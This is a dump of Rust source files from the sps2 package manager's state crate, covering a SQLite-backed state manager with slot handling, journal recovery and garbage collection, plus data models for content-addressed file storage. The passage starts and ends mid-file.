        // Packages without a mapped row id were not added in this
        // transaction; skip their file hashes.
        let Some(&db_package_id) = package_id_map.get(package_id) else {
            continue;
        };
        for file_hash in file_hashes {
            let mode = file_hash.mode;
            let file_ref = crate::FileReference {
                package_id: db_package_id,
                relative_path: file_hash.relative_path.clone(),
                hash: file_hash.hash.clone(),
                metadata: crate::FileMetadata {
                    size: file_hash.size as i64,
                    // Default to rw-r--r-- when no mode was recorded.
                    permissions: mode.unwrap_or(0o644),
                    uid: 0,
                    gid: 0,
                    mtime: None,
                    is_executable: mode.map(|m| m & 0o111 != 0).unwrap_or(false),
                    is_symlink: file_hash.is_symlink,
                    symlink_target: None,
                },
            };
            let _ =
                queries::add_file_object(tx, &file_ref.hash, &file_ref.metadata).await?;
            queries::add_package_file_entry(tx, db_package_id, &file_ref).await?;
            inserted += 1;
        }
    }
    Ok(inserted)
}
/// Insert pre-built file references, returning the number inserted.
async fn process_file_references(
    &self,
    tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
    file_references: &[(i64, crate::FileReference)],
) -> Result<usize, Error> {
    for (package_id, file_ref) in file_references {
        let _ = queries::add_file_object(tx, &file_ref.hash, &file_ref.metadata).await?;
        queries::add_package_file_entry(tx, *package_id, file_ref).await?;
    }
    // Each entry was inserted exactly once; any failure above returns early.
    Ok(file_references.len())
}
/// Create a new state manager with database setup
///
/// # Errors
///
/// Returns an error if database setup, migrations, or directory creation fails.
pub async fn new(base_path: &std::path::Path) -> Result<Self, Error> {
    let db_path = base_path.join("state.sqlite");
    let state_path = base_path.join("states");
    let live_path = base_path.join("live");
    // Create database pool and run migrations
    let pool = crate::create_pool(&db_path).await?;
    crate::run_migrations(&pool).await?;
    // Check if we need to create an initial state
    Self::ensure_initial_state(&pool).await?;
    // Create event channel (events will be ignored for now)
    let (tx, _rx) = sps2_events::channel();
    let live_slots = LiveSlots::initialize(state_path.clone(), live_path.clone()).await?;
    let live_slots = Arc::new(Mutex::new(live_slots));
    let mut manager = Self {
        pool,
        state_path,
        live_path,
        live_slots,
        tx,
    };
    // Attempt to recover from a previous transaction if a journal exists.
    // A recovery failure is surfaced as a warning event but does not abort
    // construction of the manager.
    if let Err(e) = manager.recover_from_journal().await {
        manager.emit(AppEvent::General(GeneralEvent::warning(format!(
            "Recovery failed: {e}"
        ))));
    }
    Ok(manager)
}
/// Create a new state manager with existing pool and event sender
///
/// Unlike [`Self::new`], this is a plain constructor: no migrations,
/// initial-state setup, or journal recovery are performed.
#[must_use]
pub fn with_pool(
    pool: Pool<Sqlite>,
    state_path: PathBuf,
    live_path: PathBuf,
    live_slots: Arc<Mutex<LiveSlots>>,
    tx: EventSender,
) -> Self {
    Self {
        pool,
        state_path,
        live_path,
        live_slots,
        tx,
    }
}
/// Get the current active state
///
/// # Errors
///
/// Returns an error if the database query fails or no active state exists.
pub async fn get_active_state(&self) -> Result<StateId, Error> {
    // Even read-only lookups run in a short-lived transaction for a
    // consistent snapshot.
    let mut tx = self.pool.begin().await?;
    let state_id = queries::get_active_state(&mut tx).await?;
    tx.commit().await?;
    Ok(state_id)
}
/// Get the live path for this state manager
#[must_use]
pub fn live_path(&self) -> &std::path::Path {
    &self.live_path
}
/// Get the state path for this state manager
#[must_use]
pub fn state_path(&self) -> &std::path::Path {
    &self.state_path
}
/// Returns the identifier of the currently active slot.
pub async fn active_slot(&self) -> SlotId {
    self.live_slots.lock().await.active_slot()
}
/// Returns the identifier of the inactive slot.
pub async fn inactive_slot(&self) -> SlotId {
    self.live_slots.lock().await.inactive_slot()
}
/// Resolve the filesystem path for a slot.
pub async fn slot_path(&self, slot: SlotId) -> PathBuf {
    self.live_slots.lock().await.slot_path(slot)
}
/// Read the recorded state for a slot.
pub async fn slot_state(&self, slot: SlotId) -> Option<Uuid> {
    self.live_slots.lock().await.slot_state(slot)
}
/// Ensure the given slot directory exists and return its path.
///
/// # Errors
///
/// Returns an error if creating the directory fails.
pub async fn ensure_slot_dir(&self, slot: SlotId) -> Result<PathBuf, Error> {
    self.live_slots.lock().await.ensure_slot_dir(slot).await
}
/// Recovers a transaction from the journal file if one exists.
///
/// # Errors
///
/// Returns an error if journal reading or recovery operations fail.
pub async fn recover_from_journal(&mut self) -> Result<(), Error> {
    if let Some(journal) = self.read_journal().await? {
        self.emit(AppEvent::General(GeneralEvent::debug_with_context(
            format!(
                "Starting recovery from journal for state {}",
                journal.new_state_id
            ),
            std::collections::HashMap::new(),
        )));
        // Resume at the phase the journal recorded: `Prepared` means the
        // filesystem swap has not happened yet; `Swapped` means only the
        // database finalization (and journal cleanup) remains.
        match journal.phase {
            sps2_types::state::TransactionPhase::Prepared => {
                self.emit(AppEvent::General(GeneralEvent::debug_with_context(
                    "Recovering from Prepared state".to_string(),
                    std::collections::HashMap::new(),
                )));
                self.execute_filesystem_swap_and_finalize(journal).await?;
            }
            sps2_types::state::TransactionPhase::Swapped => {
                self.emit(AppEvent::General(GeneralEvent::debug_with_context(
                    "Recovering from Swapped state".to_string(),
                    std::collections::HashMap::new(),
                )));
                self.finalize_db_state(journal.new_state_id).await?;
                self.clear_journal().await?;
            }
        }
        self.emit(AppEvent::General(GeneralEvent::debug_with_context(
            "Recovery completed".to_string(),
            std::collections::HashMap::new(),
        )));
    }
    Ok(())
}
/// Persist the association between a slot and a state identifier.
///
/// # Errors
///
/// Returns an error if persisting the slot state fails.
pub async fn set_slot_state(&self, slot: SlotId, state: Option<Uuid>) -> Result<(), Error> {
    let mut slots = self.live_slots.lock().await;
    slots.record_slot_state(slot, state).await
}
#[allow(dead_code)]
/// Refresh slot states from disk markers.
///
/// Re-reads the on-disk slot marker files into the in-memory slot table.
///
/// # Errors
///
/// Returns an error if refreshing slot states fails.
pub async fn refresh_live_slots(&self) -> Result<(), Error> {
    let mut slots = self.live_slots.lock().await;
    slots.refresh_slot_states().await
}
/// Get all installed packages in current state
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_installed_packages(&self) -> Result<Vec<Package>, Error> {
    let mut tx = self.pool.begin().await?;
    // Resolve the active state and list its packages in the same
    // transaction so the two reads are consistent.
    let state_id = queries::get_active_state(&mut tx).await?;
    let packages = queries::get_state_packages(&mut tx, &state_id).await?;
    tx.commit().await?;
    Ok(packages)
}
/// Get all installed packages in a specific state
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_installed_packages_in_state(
    &self,
    state_id: &StateId,
) -> Result<Vec<Package>, Error> {
    let mut tx = self.pool.begin().await?;
    let packages = queries::get_state_packages(&mut tx, state_id).await?;
    tx.commit().await?;
    Ok(packages)
}
/// Begin a state transition
///
/// Creates a `staging-<uuid>` directory under the states directory, seeded
/// from the current live tree when one exists (empty on first install).
///
/// # Errors
///
/// Returns an error if database queries fail or filesystem operations fail.
pub async fn begin_transition(&self, operation: &str) -> Result<StateTransition, Error> {
    // Get current state
    let mut tx = self.pool.begin().await?;
    let current_state = queries::get_active_state(&mut tx).await?;
    tx.commit().await?;
    // Create staging directory
    let staging_id = Uuid::new_v4();
    let staging_path = self.state_path.join(format!("staging-{staging_id}"));
    // Clone current state to staging (or create empty staging for first install)
    if sps2_root::exists(&self.live_path).await {
        sps2_root::clone_directory(&self.live_path, &staging_path).await?;
    } else {
        sps2_root::create_dir_all(&staging_path).await?;
    }
    Ok(StateTransition {
        from: current_state,
        to: staging_id,
        staging_path,
        operation: operation.to_string(),
    })
}
// Note: rollback is now implemented reconstructively in the installer crate.
/// Get state history
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_history(&self) -> Result<Vec<State>, Error> {
    let mut tx = self.pool.begin().await?;
    let states = queries::get_all_states(&mut tx).await?;
    tx.commit().await?;
    Ok(states)
}
/// Clean up old states
///
/// Marks states beyond the retention policy (count, plus optional age in
/// days) as pruned, removes old state directories and safely-removable
/// orphaned staging directories, and records the work in the `gc_log`
/// table. Emits `CleanupStarted`/`CleanupCompleted` events around the work.
///
/// # Errors
///
/// Returns an error if database operations or filesystem cleanup fails.
pub async fn cleanup(
    &self,
    retention_count: usize,
    retention_days: u32,
) -> Result<CleanupResult, Error> {
    let mut tx = self.pool.begin().await?;
    // Determine states to prune (visibility) using policy
    let prune_by_count =
        queries::get_states_for_cleanup_strict(&mut tx, retention_count).await?;
    let mut prune_ids: std::collections::HashSet<String> = prune_by_count.into_iter().collect();
    if retention_days > 0 {
        // Age-based pruning is additive to the count-based policy.
        let cutoff = chrono::Utc::now().timestamp() - i64::from(retention_days) * 86_400;
        let older = queries::get_states_older_than(&mut tx, cutoff).await?;
        for id in older {
            prune_ids.insert(id);
        }
    }
    let active = queries::get_active_state(&mut tx).await?;
    let active_str = active.to_string();
    let now_ts = chrono::Utc::now().timestamp();
    let prune_list: Vec<String> = prune_ids.into_iter().collect();
    let states_pruned =
        queries::mark_pruned_states(&mut tx, &prune_list, now_ts, &active_str).await?;
    // Legacy directories to remove (IDs beyond newest N)
    let states_to_remove =
        queries::get_states_for_cleanup_strict(&mut tx, retention_count).await?;
    let cleanup_start = Instant::now();
    let mut cleanup_summary = CleanupSummary {
        planned_states: states_to_remove.len(),
        removed_states: None,
        space_freed_bytes: None,
        duration_ms: None,
    };
    self.tx.emit(AppEvent::State(StateEvent::CleanupStarted {
        summary: cleanup_summary.clone(),
    }));
    let mut space_freed = 0u64;
    let mut removed_count: usize = 0;
    // Remove state directories
    for state_id in &states_to_remove {
        let state_path = self.state_path.join(state_id);
        if sps2_root::exists(&state_path).await {
            // Measure before deleting so freed space can be reported.
            space_freed += sps2_root::size(&state_path).await?;
            sps2_root::remove_dir_all(&state_path).await?;
            removed_count += 1;
        }
    }
    // Clean up orphaned staging directories (only if safe to remove)
    let mut entries = tokio::fs::read_dir(&self.state_path).await?;
    while let Some(entry) = entries.next_entry().await? {
        let name = entry.file_name();
        if let Some(name_str) = name.to_str() {
            if name_str.starts_with("staging-") {
                // Extract staging ID from directory name
                if let Some(id_str) = name_str.strip_prefix("staging-") {
                    if let Ok(staging_id) = uuid::Uuid::parse_str(id_str) {
                        // Only remove if it's safe to do so
                        if self.can_remove_staging(&staging_id).await? {
                            let path = entry.path();
                            space_freed += sps2_root::size(&path).await?;
                            sps2_root::remove_dir_all(&path).await?;
                            removed_count += 1;
                        }
                    }
                }
            }
        }
    }
    // Log cleanup operation to gc_log table
    let total_items_removed = i64::try_from(removed_count)
        .map_err(|e| Error::internal(format!("items removed count overflow: {e}")))?;
    let space_freed_i64 = i64::try_from(space_freed)
        .map_err(|e| Error::internal(format!("space freed overflow: {e}")))?;
    queries::insert_gc_log(&mut tx, total_items_removed, space_freed_i64).await?;
    tx.commit().await?;
    cleanup_summary.removed_states = Some(removed_count);
    cleanup_summary.space_freed_bytes = Some(space_freed);
    cleanup_summary.duration_ms =
        Some(u64::try_from(cleanup_start.elapsed().as_millis()).unwrap_or(u64::MAX));
    self.tx.emit(AppEvent::State(StateEvent::CleanupCompleted {
        summary: cleanup_summary,
    }));
    Ok(CleanupResult {
        states_pruned,
        states_removed: removed_count,
        space_freed,
    })
}
/// Get package dependents
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_package_dependents(
    &self,
    package_id: &sps2_resolver::PackageId,
) -> Result<Vec<String>, Error> {
    let mut tx = self.pool.begin().await?;
    let dependents = queries::get_package_dependents(&mut tx, &package_id.name).await?;
    tx.commit().await?;
    Ok(dependents)
}
/// Garbage collect unreferenced store items
///
/// Deletes the unreferenced rows from the database and returns their
/// hashes so the caller can remove the corresponding store files.
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn gc_store(&self) -> Result<Vec<Hash>, Error> {
    let mut tx = self.pool.begin().await?;
    let unreferenced = queries::get_unreferenced_store_items(&mut tx).await?;
    let hashes: Vec<Hash> = unreferenced.iter().map(StoreRef::hash).collect();
    let hash_strings: Vec<String> = unreferenced.iter().map(|item| item.hash.clone()).collect();
    queries::delete_unreferenced_store_items(&mut tx, &hash_strings).await?;
    tx.commit().await?;
    Ok(hashes)
}
/// Garbage collect unreferenced store items with file removal
///
/// Database rows are deleted (and the transaction committed) first; file
/// removal is best-effort afterwards, with failures reported as warning
/// events rather than aborting the sweep.
///
/// # Errors
///
/// Returns an error if database operations or file removal fails.
pub async fn gc_store_with_removal(
    &self,
    store: &sps2_store::PackageStore,
) -> Result<usize, Error> {
    let mut tx = self.pool.begin().await?;
    // Get unreferenced items
    let unreferenced = queries::get_unreferenced_store_items(&mut tx).await?;
    let hashes: Vec<Hash> = unreferenced.iter().map(StoreRef::hash).collect();
    let hash_strings: Vec<String> = unreferenced.iter().map(|item| item.hash.clone()).collect();
    let packages_removed = unreferenced.len();
    let cleanup_start = Instant::now();
    let mut cleanup_summary = CleanupSummary {
        planned_states: packages_removed,
        removed_states: None,
        space_freed_bytes: None,
        duration_ms: None,
    };
    self.tx.emit(AppEvent::State(StateEvent::CleanupStarted {
        summary: cleanup_summary.clone(),
    }));
    // Delete from database first
    queries::delete_unreferenced_store_items(&mut tx, &hash_strings).await?;
    // Log GC operation to gc_log table (only counting packages removed, space calculation is approximate)
    let packages_removed_i64 = i64::try_from(packages_removed)
        .map_err(|e| Error::internal(format!("packages removed count overflow: {e}")))?;
    let total_size: i64 = unreferenced.iter().map(|item| item.size).sum();
    queries::insert_gc_log(&mut tx, packages_removed_i64, total_size).await?;
    tx.commit().await?;
    // Remove files from store
    for hash in &hashes {
        if let Err(e) = store.remove_package(hash).await {
            // Log warning but continue with other packages
            self.tx
                .emit(AppEvent::General(GeneralEvent::warning(format!(
                    "Failed to remove package {}: {e}",
                    hash.to_hex()
                ))));
        }
    }
    let space_freed_bytes: u64 = unreferenced
        .iter()
        .map(|item| u64::try_from(item.size).unwrap_or(0))
        .sum();
    cleanup_summary.removed_states = Some(packages_removed);
    cleanup_summary.space_freed_bytes = Some(space_freed_bytes);
    cleanup_summary.duration_ms =
        Some(u64::try_from(cleanup_start.elapsed().as_millis()).unwrap_or(u64::MAX));
    self.tx.emit(AppEvent::State(StateEvent::CleanupCompleted {
        summary: cleanup_summary,
    }));
    Ok(packages_removed)
}
/// Add package reference
///
/// Runs in its own transaction; see [`Self::add_package_ref_with_tx`] for
/// the caller-managed variant.
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn add_package_ref(&self, package_ref: &PackageRef) -> Result<(), Error> {
    let mut tx = self.pool.begin().await?;
    // Add package to the state
    queries::add_package(
        &mut tx,
        &package_ref.state_id,
        &package_ref.package_id.name,
        &package_ref.package_id.version.to_string(),
        &package_ref.hash,
        package_ref.size,
    )
    .await?;
    // Ensure store reference exists and increment it
    queries::get_or_create_store_ref(&mut tx, &package_ref.hash, package_ref.size).await?;
    queries::increment_store_ref(&mut tx, &package_ref.hash).await?;
    tx.commit().await?;
    Ok(())
}
/// Add package reference with venv path
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn add_package_ref_with_venv(
    &self,
    package_ref: &PackageRef,
    venv_path: Option<&str>,
) -> Result<(), Error> {
    let mut tx = self.pool.begin().await?;
    // Add package to the state with venv path
    queries::add_package_with_venv(
        &mut tx,
        &package_ref.state_id,
        &package_ref.package_id.name,
        &package_ref.package_id.version.to_string(),
        &package_ref.hash,
        package_ref.size,
        venv_path,
    )
    .await?;
    // Ensure store reference exists and increment it
    queries::get_or_create_store_ref(&mut tx, &package_ref.hash, package_ref.size).await?;
    queries::increment_store_ref(&mut tx, &package_ref.hash).await?;
    tx.commit().await?;
    Ok(())
}
/// Add package reference with an existing transaction
///
/// The caller owns the transaction; the database row id of the inserted
/// package is returned.
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn add_package_ref_with_tx(
    &self,
    tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
    package_ref: &PackageRef,
) -> Result<i64, Error> {
    // Add package to the state and get its ID
    let package_id = queries::add_package(
        tx,
        &package_ref.state_id,
        &package_ref.package_id.name,
        &package_ref.package_id.version.to_string(),
        &package_ref.hash,
        package_ref.size,
    )
    .await?;
    // Ensure store reference exists and increment it
    queries::get_or_create_store_ref(tx, &package_ref.hash, package_ref.size).await?;
    queries::increment_store_ref(tx, &package_ref.hash).await?;
    Ok(package_id)
}
/// Add package reference with venv path using an existing transaction
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn add_package_ref_with_venv_tx(
    &self,
    tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
    package_ref: &PackageRef,
    venv_path: Option<&str>,
) -> Result<i64, Error> {
    // Add package to the state with venv path and get its ID
    let package_id = queries::add_package_with_venv(
        tx,
        &package_ref.state_id,
        &package_ref.package_id.name,
        &package_ref.package_id.version.to_string(),
        &package_ref.hash,
        package_ref.size,
        venv_path,
    )
    .await?;
    // Ensure store reference exists and increment it
    queries::get_or_create_store_ref(tx, &package_ref.hash, package_ref.size).await?;
    queries::increment_store_ref(tx, &package_ref.hash).await?;
    Ok(package_id)
}
/// Get state path for a state ID
///
/// # Errors
///
/// Currently does not fail, but returns `Result` for API consistency.
pub fn get_state_path(
    &self,
    state_id: sps2_types::StateId,
) -> Result<std::path::PathBuf, Error> {
    Ok(self.state_path.join(state_id.to_string()))
}
/// Set active state
///
/// # Errors
///
/// Returns an error if the database update fails.
pub async fn set_active_state(&self, state_id: sps2_types::StateId) -> Result<(), Error> {
    let mut tx = self.pool.begin().await?;
    queries::set_active_state(&mut tx, &state_id).await?;
    tx.commit().await?;
    Ok(())
}
/// Set active state with transaction
///
/// Caller-managed-transaction variant of [`Self::set_active_state`]; the
/// caller is responsible for committing.
///
/// # Errors
///
/// Returns an error if the database update fails.
pub async fn set_active_state_with_tx(
    &self,
    tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
    state_id: sps2_types::StateId,
) -> Result<(), Error> {
    queries::set_active_state(tx, &state_id).await?;
    Ok(())
}
/// Check if state exists
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn state_exists(&self, state_id: &sps2_types::StateId) -> Result<bool, Error> {
    let mut tx = self.pool.begin().await?;
    let exists = queries::state_exists(&mut tx, state_id).await?;
    tx.commit().await?;
    Ok(exists)
}
/// List all states
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn list_states(&self) -> Result<Vec<sps2_types::StateId>, Error> {
    let mut tx = self.pool.begin().await?;
    let states = queries::list_states(&mut tx).await?;
    tx.commit().await?;
    Ok(states)
}
/// List all states with full details
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn list_states_detailed(&self) -> Result<Vec<State>, Error> {
    let mut tx = self.pool.begin().await?;
    let states = queries::list_states_detailed(&mut tx).await?;
    tx.commit().await?;
    Ok(states)
}
/// Get packages in a state
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_state_packages(
    &self,
    state_id: &sps2_types::StateId,
) -> Result<Vec<String>, Error> {
    let mut tx = self.pool.begin().await?;
    let packages = queries::get_state_package_names(&mut tx, state_id).await?;
    tx.commit().await?;
    Ok(packages)
}
/// Clean up old states
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn cleanup_old_states(
    &self,
    keep_count: usize,
) -> Result<Vec<sps2_types::StateId>, Error> {
    let mut tx = self.pool.begin().await?;
    // Get states strictly by creation time, keeping only the N newest
    // This replaces the old age+retention logic with pure retention by creation time
    let states = queries::get_states_for_cleanup_strict(&mut tx, keep_count).await?;
    tx.commit().await?;
    // Convert strings to StateIds
    // NOTE(review): rows with malformed UUIDs are silently skipped here —
    // confirm that is intended rather than an error condition.
    let state_ids = states
        .into_iter()
        .filter_map(|s| uuid::Uuid::parse_str(&s).ok())
        .collect();
    Ok(state_ids)
}
/// Get current state ID
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_current_state_id(&self) -> Result<sps2_types::StateId, Error> {
    self.get_active_state().await
}
/// Begin a database transaction for caller-managed multi-step operations.
///
/// # Errors
///
/// Returns an error if the database transaction cannot be started.
pub async fn begin_transaction(&self) -> Result<sqlx::Transaction<'_, sqlx::Sqlite>, Error> {
    Ok(self.pool.begin().await?)
}
/// Get venv path for a package
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_package_venv_path(
    &self,
    package_name: &str,
    package_version: &str,
) -> Result<Option<String>, Error> {
    let mut tx = self.pool.begin().await?;
    // Venv lookups are always scoped to the currently active state.
    let state_id = queries::get_active_state(&mut tx).await?;
    let venv_path =
        queries::get_package_venv_path(&mut tx, &state_id, package_name, package_version)
            .await?;
    tx.commit().await?;
    Ok(venv_path)
}
/// Get all packages with venvs in the current state
///
/// # Errors
///
/// Returns an error if the database query fails.
pub async fn get_packages_with_venvs(&self) -> Result<Vec<(String, String, String)>, Error> {
    let mut tx = self.pool.begin().await?;
    let state_id = queries::get_active_state(&mut tx).await?;
    let packages = queries::get_packages_with_venvs(&mut tx, &state_id).await?;
    tx.commit().await?;
    Ok(packages)
}
/// Update venv path for a package
///
/// # Errors
///
/// Returns an error if the database update fails.
pub async fn update_package_venv_path(
    &self,
    package_name: &str,
    package_version: &str,
    venv_path: Option<&str>,
) -> Result<(), Error> {
    let mut tx = self.pool.begin().await?;
    let state_id = queries::get_active_state(&mut tx).await?;
    queries::update_package_venv_path(
        &mut tx,
        &state_id,
        package_name,
        package_version,
        venv_path,
    )
    .await?;
    tx.commit().await?;
    Ok(())
}
/// Create state with transaction
///
/// Inserts a new state row inside the caller's transaction; the caller is
/// responsible for committing.
///
/// # Errors
///
/// Returns an error if the database insert fails.
pub async fn create_state_with_tx(
    &self,
    tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
    state_id: &sps2_types::StateId,
    parent_id: Option<&sps2_types::StateId>,
    operation: &str,
) -> Result<(), Error> {
    queries::create_state(tx, state_id, parent_id, operation).await
}
/// Get parent state ID
///
/// # Errors
///
/// Returns an error if database operations fail.
pub async fn get_parent_state_id(
    &self,
    state_id: &sps2_types::StateId,
) -> Result<Option<sps2_types::StateId>, Error> {
    let mut tx = self.pool.begin().await?;
    let parent_id = queries::get_parent_state_id(&mut tx, state_id).await?;
    tx.commit().await?;
    Ok(parent_id)
}
/// Verify database consistency
///
/// # Errors
///
/// Returns an error if database verification fails.
pub async fn verify_consistency(&self) -> Result<(), Error> {
    let mut tx = self.pool.begin().await?;
    // Basic verification - check if we can query the database
    let _active_state = queries::get_active_state(&mut tx).await?;
    tx.commit().await?;
    Ok(())
}
/// Unprune a state so it appears again in base history
///
/// # Errors
///
/// Returns an error if the database update fails.
pub async fn unprune_state(&self, state_id: &sps2_types::StateId) -> Result<(), Error> {
    let mut tx = self.pool.begin().await?;
    let id_str = state_id.to_string();
    queries::unprune_state(&mut tx, &id_str).await?;
    tx.commit().await?;
    Ok(())
}
/// Ensure an initial state exists, creating one if necessary
///
/// # Errors
///
/// Returns an error if database operations fail.
async fn ensure_initial_state(pool: &Pool<Sqlite>) -> Result<(), Error> {
let mut tx = pool.begin().await?;
// Check if any states exist
let state_count: i64 = sqlx::query_scalar("SELECT COUNT(*) FROM states")
.fetch_one(&mut *tx)
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | true |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/file_models.rs | crates/state/src/file_models.rs | //! Database models for file-level content addressable storage
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use sps2_hash::Hash;
use sqlx::FromRow;
/// A file object in content-addressed storage
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct FileObject {
    /// Content hash stored as a hex string.
    pub hash: String,
    /// Size in bytes.
    pub size: i64,
    /// Creation time as Unix seconds.
    pub created_at: i64,
    /// Number of references currently held against this object.
    pub ref_count: i64,
    /// Executable flag recorded for the object.
    pub is_executable: bool,
    /// Whether the entry represents a symlink.
    pub is_symlink: bool,
    /// Symlink target path, when recorded.
    pub symlink_target: Option<String>,
}
impl FileObject {
    /// Parse the hash
    ///
    /// # Panics
    ///
    /// Panics if the stored hash string is not valid.
    #[must_use]
    pub fn hash(&self) -> Hash {
        Hash::from_hex(&self.hash).expect("valid hash in database")
    }
    /// Get creation timestamp
    ///
    /// # Panics
    ///
    /// Panics if the stored timestamp is not valid.
    #[must_use]
    pub fn created_at(&self) -> DateTime<Utc> {
        DateTime::from_timestamp(self.created_at, 0).expect("valid timestamp in database")
    }
    /// Check if the file is referenced by any packages
    #[must_use]
    pub fn is_referenced(&self) -> bool {
        self.ref_count > 0
    }
}
/// A file entry within a package
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct PackageFileEntry {
    /// Database row id.
    pub id: i64,
    /// Database id of the owning package.
    pub package_id: i64,
    /// Content hash of the file, as hex.
    pub file_hash: String,
    /// Path relative to the package root.
    pub relative_path: String,
    /// Unix mode bits stored as an integer column.
    pub permissions: i64,
    pub uid: i64,
    pub gid: i64,
    /// Modification time as Unix seconds, when recorded.
    pub mtime: Option<i64>,
}
impl PackageFileEntry {
    /// Parse the file hash
    ///
    /// # Panics
    ///
    /// Panics if the stored hash string is not valid.
    #[must_use]
    pub fn file_hash(&self) -> Hash {
        Hash::from_hex(&self.file_hash).expect("valid hash in database")
    }
    /// Get modification timestamp if available
    #[must_use]
    pub fn mtime(&self) -> Option<DateTime<Utc>> {
        self.mtime.and_then(|ts| DateTime::from_timestamp(ts, 0))
    }
    /// Get Unix permissions as octal
    ///
    /// Returns the raw mode bits (conventionally displayed in octal).
    /// NOTE(review): the `as u32` cast silently truncates out-of-range
    /// i64 values — confirm the column always fits in u32.
    #[must_use]
    pub fn permissions_octal(&self) -> u32 {
        self.permissions as u32
    }
}
/// An installed file tracking its location
#[derive(Debug, Clone, FromRow, Serialize, Deserialize)]
pub struct InstalledFile {
    /// Database row id.
    pub id: i64,
    /// UUID (string form) of the state the file belongs to.
    pub state_id: String,
    /// Database id of the owning package.
    pub package_id: i64,
    /// Content hash of the file, as hex.
    pub file_hash: String,
    /// Installed location — absolute or state-relative; TODO confirm which
    /// at the writer.
    pub installed_path: String,
    pub is_directory: bool,
}
impl InstalledFile {
    /// Parse the file hash
    ///
    /// # Panics
    ///
    /// Panics if the stored hash string is not valid.
    #[must_use]
    pub fn file_hash(&self) -> Hash {
        Hash::from_hex(&self.file_hash).expect("valid hash in database")
    }
    /// Parse the state ID as UUID
    ///
    /// # Panics
    ///
    /// Panics if the stored state ID is not a valid UUID.
    #[must_use]
    pub fn state_uuid(&self) -> uuid::Uuid {
        uuid::Uuid::parse_str(&self.state_id).expect("valid UUID in database")
    }
}
/// Simple modification time tracker for file verification optimization
#[derive(Debug, Clone)]
pub struct FileMTimeTracker {
    /// Path of the tracked file.
    pub file_path: String,
    /// Modification time observed at the last verification — presumably
    /// Unix seconds; confirm at the producer.
    pub last_verified_mtime: i64,
}
/// Summary statistics for file-level storage
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct FileStorageStats {
    pub total_files: i64,
    pub unique_files: i64,
    pub total_size: i64,
    /// Bytes actually stored after deduplication.
    pub deduplicated_size: i64,
    /// Deduplication ratio — exact definition set by the producer.
    pub deduplication_ratio: f64,
}
/// File metadata for storage operations
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct FileMetadata {
    /// Size in bytes.
    pub size: i64,
    /// Unix mode bits.
    pub permissions: u32,
    pub uid: u32,
    pub gid: u32,
    /// Modification time as Unix seconds, when known.
    pub mtime: Option<i64>,
    /// True when any execute bit (0o111) is set.
    pub is_executable: bool,
    pub is_symlink: bool,
    /// Target path when `is_symlink` is true.
    pub symlink_target: Option<String>,
}
impl FileMetadata {
    /// Create metadata for a regular file
    ///
    /// Ownership defaults to uid/gid 0 and no mtime is recorded.
    #[must_use]
    pub fn regular_file(size: i64, permissions: u32) -> Self {
        // Any execute bit (user/group/other) marks the file executable.
        let is_executable = permissions & 0o111 != 0;
        Self {
            size,
            permissions,
            uid: 0,
            gid: 0,
            mtime: None,
            is_executable,
            is_symlink: false,
            symlink_target: None,
        }
    }
    /// Create metadata for a symlink
    ///
    /// The recorded size mirrors the length of the target path string.
    #[must_use]
    pub fn symlink(target: String) -> Self {
        let size = target.len() as i64;
        Self {
            size,
            permissions: 0o777,
            uid: 0,
            gid: 0,
            mtime: None,
            is_executable: false,
            is_symlink: true,
            symlink_target: Some(target),
        }
    }
}
/// Result of a file deduplication check
#[derive(Debug, Clone)]
pub struct DeduplicationResult {
    /// Content hash of the checked file.
    pub hash: Hash,
    /// True when an identical object already existed in the store.
    pub was_duplicate: bool,
    /// Reference count observed for the object.
    pub ref_count: i64,
    /// Bytes saved by not storing a second copy (0 for new objects).
    pub space_saved: i64,
}
/// File reference for batch operations
#[derive(Debug, Clone)]
pub struct FileReference {
    /// Database id of the owning package row.
    pub package_id: i64,
    /// Path of the file relative to the package root.
    pub relative_path: String,
    pub hash: Hash,
    pub metadata: FileMetadata,
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/file_queries_runtime.rs | crates/state/src/file_queries_runtime.rs | //! File-level queries for CAS (schema v2)
use crate::file_models::{
DeduplicationResult, FileMTimeTracker, FileMetadata, FileObject, FileReference,
PackageFileEntry,
};
use sps2_errors::{Error, StateError};
use sps2_hash::Hash;
use sqlx::{query, Row, Sqlite, Transaction};
use std::collections::HashMap;
/// Insert a file object entry, or refresh an existing one.
///
/// NOTE(review): despite the original "insert or increment" wording, this
/// function never changes `ref_count` — new rows start at 0 and duplicates
/// only get `last_seen_at` refreshed; incrementing is done separately via
/// `increment_file_object_ref`. In both cases a `file_verification` row is
/// ensured so the verifier can track the object.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn add_file_object(
